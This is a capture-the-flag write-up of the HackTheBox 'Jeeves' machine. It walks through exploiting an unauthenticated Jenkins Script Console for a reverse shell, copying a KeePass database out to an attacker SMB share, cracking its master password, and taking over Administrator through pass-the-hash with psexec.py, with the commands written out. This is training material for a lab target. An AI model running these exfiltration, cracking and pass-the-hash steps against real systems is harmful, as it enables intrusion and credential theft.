Logo
Overview
Jeeves (HackTheBox)

Jeeves (HackTheBox)

w1zardx w1zardx
December 27, 2025
3 min read
HackTheBox Jenkins Groovy KeePass Pass-The-Hash Password Cracking CPTS
Operating SystemDifficultyMachine Link
MediumJeeves

Attack Chain

  • Initial Access: Exploited an unauthenticated Jenkins Script Console to execute arbitrary Groovy code and gain a reverse shell as the kohsuke user.
  • Privilege Escalation: Discovered a KeePass password database during local enumeration, cracked its master password, extracted the Administrator’s NTLM hash, and leveraged Pass-the-Hash to achieve full system compromise.

Machine Enumeration

Nmap

Terminal window
PORT      STATE SERVICE      REASON
80/tcp    open  http         syn-ack ttl 127
135/tcp   open  msrpc        syn-ack ttl 127
445/tcp   open  microsoft-ds syn-ack ttl 127
50000/tcp open  ibm-db2      syn-ack ttl 127


$ nmap -p 50000 -sVC 10.129.228.112
PORT      STATE SERVICE VERSION
50000/tcp open  http    Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found

Web Enumeration – Port 80

Standard directory and file fuzzing (using common wordlists) yielded no meaningful results.

Web Enumeration – Port 50000

Fuzzing on port 50000 uncovered a hidden path: askjeeves. This directory hosted a Jenkins instance:

Terminal window
$ ffuf -c -w `fzf-wordlists` -u "http://10.129.228.112:50000/FUZZ" -mc all -fc 404 -fs 503


askjeeves               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]

Critically, the Jenkins dashboard required no authentication, exposing powerful administrative functionality to any unauthenticated user.

Jenkins Dashboard

Gaining a Shell as kohsuke

Remote Code Execution via Groovy

Jenkins includes a Script Console (accessible under Manage Jenkins) that allows administrators to run Groovy scripts directly on the server.

Manage Jenkins Script Console Jenkins Script Console Textbox

Groovy, being a JVM-based language, can execute OS commands through Java interop. Reverse shell payloads are readily available on platforms like revshells.com.

Groovy Script Reverse Shell Generator

revshells.com payloads assume a Linux target (/bin/sh). Since Jeeves Machine runs Windows, the payload must be adapted to invoke cmd.exe or powershell.exe.

After modifying the payload and setting up a listener, execution via the Script Console returned a stable reverse shell as the low-privileged user kohsuke.

Reverse Shell Success

Privilege Escalation

Local Enumeration and KeePass Discovery

User enumeration began in C:\Users\kohsuke. Running tree /f /a revealed a promising file in the Documents directory: CEH.kdbx — a KeePass password database.

Terminal window
C:\Users\kohsuke>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is 00000200 71A1:6FA1
C:.
+---.groovy
|   \---grapes
+---Contacts
+---Desktop
|       user.txt
|
+---Documents
|       CEH.kdbx
|
...[snip]...

Exfiltrating the Database

To crack the database offline, I transferred CEH.kdbx to my attacker machine using Impacket’s smbserver.py:

Terminal window
$ smbserver.py share . -smb2support -username user -password password
Terminal window
C:\> net use \\10.10.14.71\share /user:user password
C:\> copy CEH.kdbx \\10.10.14.71\share

Cracking the Master Password

Using keepass2john, the database was converted into a hash format compatible with John the Ripper:

Terminal window
$ keepass2john CEH.kdbx > keepass.hashes
$ cat keepass.hashes
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48


$ john --wordlist=`fzf-wordlists` keepass.hashes


moonshine1       (CEH)

The master password was cracked as moonshine1. The database was then opened in KeePassXC, revealing multiple stored credentials.

CEH Keepass Administrator NTLM Hash

Although the context was unclear, I tested the hash directly against the machine using Pass-the-Hash to Administrator account.

Pass-the-Hash to Administrator

Using NetExec, I validated the hash:

Terminal window
$ nxc smb 10.129.228.112 -u 'Administrator' -H e0fb1fb85756c24235ff238cbe81fe00


SMB         10.129.228.112  445    JEEVES           [*] Windows 10 Build 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB         10.129.228.112  445    JEEVES           [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (admin)

Authentication succeeded. Finally, I used Impacket’s psexec.py to spawn an elevated remote shell:

Terminal window
$ psexec.py -hashes :"e0fb1fb85756c24235ff238cbe81fe00" "Jeeves"/"Administrator"@"10.129.228.112"

Pass-The-Hash

With this, I obtained full administrative control over the Jeeves machine.